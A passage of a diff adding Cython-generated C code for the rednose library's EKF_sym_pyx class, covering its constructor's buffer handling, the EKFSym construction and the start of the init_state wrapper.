&__pyx_pybuffer_x_initial; + __pyx_pybuffer_P_initial.pybuffer.buf = NULL; + __pyx_pybuffer_P_initial.refcount = 0; + __pyx_pybuffernd_P_initial.data = NULL; + __pyx_pybuffernd_P_initial.rcbuffer = &__pyx_pybuffer_P_initial; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_Q.rcbuffer->pybuffer, (PyObject*)__pyx_v_Q, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) __PYX_ERR(0, 83, __pyx_L1_error) + } + __pyx_pybuffernd_Q.diminfo[0].strides = __pyx_pybuffernd_Q.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_Q.diminfo[0].shape = __pyx_pybuffernd_Q.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_Q.diminfo[1].strides = __pyx_pybuffernd_Q.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_Q.diminfo[1].shape = __pyx_pybuffernd_Q.rcbuffer->pybuffer.shape[1]; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_x_initial.rcbuffer->pybuffer, (PyObject*)__pyx_v_x_initial, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 1, 0, __pyx_stack) == -1)) __PYX_ERR(0, 83, __pyx_L1_error) + } + __pyx_pybuffernd_x_initial.diminfo[0].strides = __pyx_pybuffernd_x_initial.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_x_initial.diminfo[0].shape = __pyx_pybuffernd_x_initial.rcbuffer->pybuffer.shape[0]; + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_P_initial.rcbuffer->pybuffer, (PyObject*)__pyx_v_P_initial, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) __PYX_ERR(0, 83, __pyx_L1_error) + } + __pyx_pybuffernd_P_initial.diminfo[0].strides = __pyx_pybuffernd_P_initial.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_P_initial.diminfo[0].shape = __pyx_pybuffernd_P_initial.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_P_initial.diminfo[1].strides = __pyx_pybuffernd_P_initial.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_P_initial.diminfo[1].shape = __pyx_pybuffernd_P_initial.rcbuffer->pybuffer.shape[1]; + + /* "rednose/helpers/ekf_sym_pyx.pyx":89 + * # TODO logger + * + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Q_b = np.ascontiguousarray(Q, dtype=np.double) # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] x_initial_b = np.ascontiguousarray(x_initial, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] P_initial_b = np.ascontiguousarray(P_initial, dtype=np.double) + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __pyx_t_1 = PyTuple_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_INCREF((PyObject *)__pyx_v_Q); + __Pyx_GIVEREF((PyObject *)__pyx_v_Q); + PyTuple_SET_ITEM(__pyx_t_1, 0, ((PyObject *)__pyx_v_Q)); + __pyx_t_3 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_double); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + if (PyDict_SetItem(__pyx_t_3, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 89, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 89, __pyx_L1_error) + __pyx_t_6 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_Q_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_6, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 2, 0, __pyx_stack) == -1)) { + __pyx_v_Q_b = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_Q_b.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 89, __pyx_L1_error) + } else {__pyx_pybuffernd_Q_b.diminfo[0].strides = __pyx_pybuffernd_Q_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_Q_b.diminfo[0].shape = __pyx_pybuffernd_Q_b.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_Q_b.diminfo[1].strides = __pyx_pybuffernd_Q_b.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_Q_b.diminfo[1].shape = __pyx_pybuffernd_Q_b.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_6 = 0; + __pyx_v_Q_b = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":90 + * + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Q_b = np.ascontiguousarray(Q, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] x_initial_b = np.ascontiguousarray(x_initial, dtype=np.double) # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] P_initial_b = np.ascontiguousarray(P_initial, dtype=np.double) + * self.ekf = new EKFSym( + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_np); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_5, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = PyTuple_New(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_INCREF((PyObject *)__pyx_v_x_initial); + __Pyx_GIVEREF((PyObject *)__pyx_v_x_initial); + PyTuple_SET_ITEM(__pyx_t_5, 0, ((PyObject *)__pyx_v_x_initial)); + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_np); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_double); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_dtype, __pyx_t_4) < 0) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_t_5, __pyx_t_1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!(likely(((__pyx_t_4) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_4, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 90, __pyx_L1_error) + __pyx_t_7 = ((PyArrayObject *)__pyx_t_4); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_7, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 1, 0, __pyx_stack) == -1)) { + __pyx_v_x_initial_b = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 90, __pyx_L1_error) + } else {__pyx_pybuffernd_x_initial_b.diminfo[0].strides = __pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_x_initial_b.diminfo[0].shape = __pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_7 = 0; + __pyx_v_x_initial_b = ((PyArrayObject *)__pyx_t_4); + __pyx_t_4 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":91 + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] Q_b = np.ascontiguousarray(Q, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] x_initial_b = np.ascontiguousarray(x_initial, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] P_initial_b = np.ascontiguousarray(P_initial, dtype=np.double) # <<<<<<<<<<<<<< + * self.ekf = new EKFSym( + * name.encode('utf8'), + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_INCREF((PyObject *)__pyx_v_P_initial); + __Pyx_GIVEREF((PyObject *)__pyx_v_P_initial); + PyTuple_SET_ITEM(__pyx_t_4, 0, ((PyObject *)__pyx_v_P_initial)); + __pyx_t_5 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_double); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PyDict_SetItem(__pyx_t_5, __pyx_n_s_dtype, __pyx_t_2) < 0) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_Call(__pyx_t_1, __pyx_t_4, __pyx_t_5); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 91, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + if (!(likely(((__pyx_t_2) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_2, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 91, __pyx_L1_error) + __pyx_t_8 = ((PyArrayObject *)__pyx_t_2); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer, (PyObject*)__pyx_t_8, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_C_CONTIGUOUS, 2, 0, __pyx_stack) == -1)) { + __pyx_v_P_initial_b = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 91, __pyx_L1_error) + } else {__pyx_pybuffernd_P_initial_b.diminfo[0].strides = __pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_P_initial_b.diminfo[0].shape = __pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_P_initial_b.diminfo[1].strides = __pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_P_initial_b.diminfo[1].shape = __pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_8 = 0; + __pyx_v_P_initial_b = ((PyArrayObject *)__pyx_t_2); + __pyx_t_2 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":93 + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] P_initial_b = np.ascontiguousarray(P_initial, dtype=np.double) + * self.ekf = new EKFSym( + * name.encode('utf8'), # <<<<<<<<<<<<<< + * MapMatrixXdr( Q_b.data, Q.shape[0], Q.shape[1]), + * MapVectorXd( x_initial_b.data, x_initial.shape[0]), + */ + if (unlikely(__pyx_v_name == Py_None)) { + PyErr_Format(PyExc_AttributeError, "'NoneType' object has no attribute '%.30s'", "encode"); + __PYX_ERR(0, 93, __pyx_L1_error) + } + __pyx_t_2 = PyUnicode_AsUTF8String(__pyx_v_name); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_9 = __pyx_convert_string_from_py_std__in_string(__pyx_t_2); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 93, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":94 + * self.ekf = new EKFSym( + * name.encode('utf8'), + * MapMatrixXdr( Q_b.data, Q.shape[0], Q.shape[1]), # <<<<<<<<<<<<<< + * MapVectorXd( x_initial_b.data, x_initial.shape[0]), + * MapMatrixXdr( P_initial_b.data, P_initial.shape[0], P_initial.shape[1]), + */ + __pyx_t_10 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_Q_b)); if (unlikely(__pyx_t_10 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 94, __pyx_L1_error) + __pyx_t_11 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_Q)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 94, __pyx_L1_error) + __pyx_t_12 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_Q)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 94, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":95 + * name.encode('utf8'), + * MapMatrixXdr( Q_b.data, Q.shape[0], Q.shape[1]), + * MapVectorXd( x_initial_b.data, x_initial.shape[0]), # <<<<<<<<<<<<<< + * MapMatrixXdr( P_initial_b.data, P_initial.shape[0], P_initial.shape[1]), + * dim_main, + */ + __pyx_t_13 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_x_initial_b)); if (unlikely(__pyx_t_13 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 95, __pyx_L1_error) + __pyx_t_14 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_x_initial)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 95, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":96 + * MapMatrixXdr( Q_b.data, Q.shape[0], Q.shape[1]), + * MapVectorXd( x_initial_b.data, x_initial.shape[0]), + * MapMatrixXdr( P_initial_b.data, P_initial.shape[0], P_initial.shape[1]), # <<<<<<<<<<<<<< + * dim_main, + * dim_main_err, + */ + __pyx_t_15 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_P_initial_b)); if (unlikely(__pyx_t_15 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 96, __pyx_L1_error) + __pyx_t_16 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_P_initial)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 96, __pyx_L1_error) + __pyx_t_17 = __pyx_f_5numpy_7ndarray_5shape_shape(((PyArrayObject *)__pyx_v_P_initial)); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 96, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":102 + * dim_augment, + * dim_augment_err, + * maha_test_kinds, # <<<<<<<<<<<<<< + * quaternion_idxs, + * [x.encode('utf8') for x in global_vars], + */ + __pyx_t_18 = __pyx_convert_vector_from_py_int(__pyx_v_maha_test_kinds); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 102, __pyx_L1_error) + + /* "rednose/helpers/ekf_sym_pyx.pyx":103 + * dim_augment_err, + * maha_test_kinds, + * quaternion_idxs, # <<<<<<<<<<<<<< + * [x.encode('utf8') for x in global_vars], + * max_rewind_age + */ + __pyx_t_19 = __pyx_convert_vector_from_py_int(__pyx_v_quaternion_idxs); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 103, __pyx_L1_error) + { /* enter inner scope */ + + /* "rednose/helpers/ekf_sym_pyx.pyx":104 + * maha_test_kinds, + * quaternion_idxs, + * [x.encode('utf8') for x in global_vars], # <<<<<<<<<<<<<< + * max_rewind_age + * ) + */ + __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 104, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_2); + if (unlikely(__pyx_v_global_vars == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not iterable"); + __PYX_ERR(0, 104, __pyx_L5_error) + } + __pyx_t_5 = __pyx_v_global_vars; __Pyx_INCREF(__pyx_t_5); __pyx_t_20 = 0; + for (;;) { + if (__pyx_t_20 >= PyList_GET_SIZE(__pyx_t_5)) break; + #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS + __pyx_t_4 = PyList_GET_ITEM(__pyx_t_5, __pyx_t_20); __Pyx_INCREF(__pyx_t_4); __pyx_t_20++; if (unlikely((0 < 0))) __PYX_ERR(0, 104, __pyx_L5_error) + #else + __pyx_t_4 = PySequence_ITEM(__pyx_t_5, __pyx_t_20); __pyx_t_20++; if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 104, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_4); + #endif + __Pyx_XDECREF_SET(__pyx_7genexpr__pyx_v_x, __pyx_t_4); + __pyx_t_4 = 0; + __pyx_t_1 = __Pyx_PyObject_GetAttrStr(__pyx_7genexpr__pyx_v_x, __pyx_n_s_encode); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 104, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_3 = NULL; + __pyx_t_21 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_1))) { + __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_1); + if (likely(__pyx_t_3)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_1); + __Pyx_INCREF(__pyx_t_3); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_1, function); + __pyx_t_21 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_3, __pyx_n_u_utf8}; + __pyx_t_4 = __Pyx_PyObject_FastCall(__pyx_t_1, __pyx_callargs+1-__pyx_t_21, 1+__pyx_t_21); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 104, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + } + if (unlikely(__Pyx_ListComp_Append(__pyx_t_2, (PyObject*)__pyx_t_4))) __PYX_ERR(0, 104, __pyx_L5_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_x); __pyx_7genexpr__pyx_v_x = 0; + goto __pyx_L9_exit_scope; + __pyx_L5_error:; + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_x); __pyx_7genexpr__pyx_v_x = 0; + goto __pyx_L1_error; + __pyx_L9_exit_scope:; + } /* exit inner scope */ + __pyx_t_22 = __pyx_convert_vector_from_py_std_3a__3a_string(__pyx_t_2); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 104, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + + /* "rednose/helpers/ekf_sym_pyx.pyx":92 + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] x_initial_b = np.ascontiguousarray(x_initial, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] P_initial_b = np.ascontiguousarray(P_initial, dtype=np.double) + * self.ekf = new EKFSym( # <<<<<<<<<<<<<< + * name.encode('utf8'), + * MapMatrixXdr( Q_b.data, Q.shape[0], Q.shape[1]), + */ + __pyx_v_self->ekf = new EKFS::EKFSym(__pyx_t_9, Eigen::Map >(((double *)__pyx_t_10), (__pyx_t_11[0]), (__pyx_t_12[1])), Eigen::Map(((double *)__pyx_t_13), (__pyx_t_14[0])), Eigen::Map >(((double *)__pyx_t_15), (__pyx_t_16[0]), (__pyx_t_17[1])), __pyx_v_dim_main, __pyx_v_dim_main_err, __pyx_v_N, __pyx_v_dim_augment, __pyx_v_dim_augment_err, __pyx_t_18, __pyx_t_19, __pyx_t_22, __pyx_v_max_rewind_age); + + /* "rednose/helpers/ekf_sym_pyx.pyx":83 + * cdef class EKF_sym_pyx: + * cdef EKFSym* ekf + * def __cinit__(self, str gen_dir, str name, np.ndarray[np.float64_t, ndim=2] Q, # <<<<<<<<<<<<<< + * np.ndarray[np.float64_t, ndim=1] x_initial, np.ndarray[np.float64_t, ndim=2] P_initial, int dim_main, + * int dim_main_err, int N=0, int dim_augment=0, int dim_augment_err=0, list maha_test_kinds=[], + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_P_initial.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Q.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Q_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_x_initial.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("rednose.helpers.ekf_sym_pyx.EKF_sym_pyx.__cinit__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_P_initial.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_P_initial_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Q.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_Q_b.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_x_initial.rcbuffer->pybuffer); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_x_initial_b.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_Q_b); + __Pyx_XDECREF((PyObject *)__pyx_v_x_initial_b); + __Pyx_XDECREF((PyObject *)__pyx_v_P_initial_b); + __Pyx_XDECREF(__pyx_7genexpr__pyx_v_x); + __Pyx_TraceReturn(Py_None, 0); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "rednose/helpers/ekf_sym_pyx.pyx":108 + * ) + * + * def init_state(self, np.ndarray[np.float64_t, ndim=1] state, np.ndarray[np.float64_t, ndim=2] covs, filter_time): # <<<<<<<<<<<<<< + * cdef np.ndarray[np.float64_t, ndim=1, mode='c'] state_b = np.ascontiguousarray(state, dtype=np.double) + * cdef np.ndarray[np.float64_t, ndim=2, mode='c'] covs_b = np.ascontiguousarray(covs, dtype=np.double) + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state = {"init_state", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_7rednose_7helpers_11ekf_sym_pyx_11EKF_sym_pyx_3init_state(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyArrayObject *__pyx_v_state = 0; + PyArrayObject *__pyx_v_covs = 0; + PyObject *__pyx_v_filter_time = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("init_state (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_state,&__pyx_n_s_covs,&__pyx_n_s_filter_time,0}; + PyObject* values[3] = {0,0,0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = 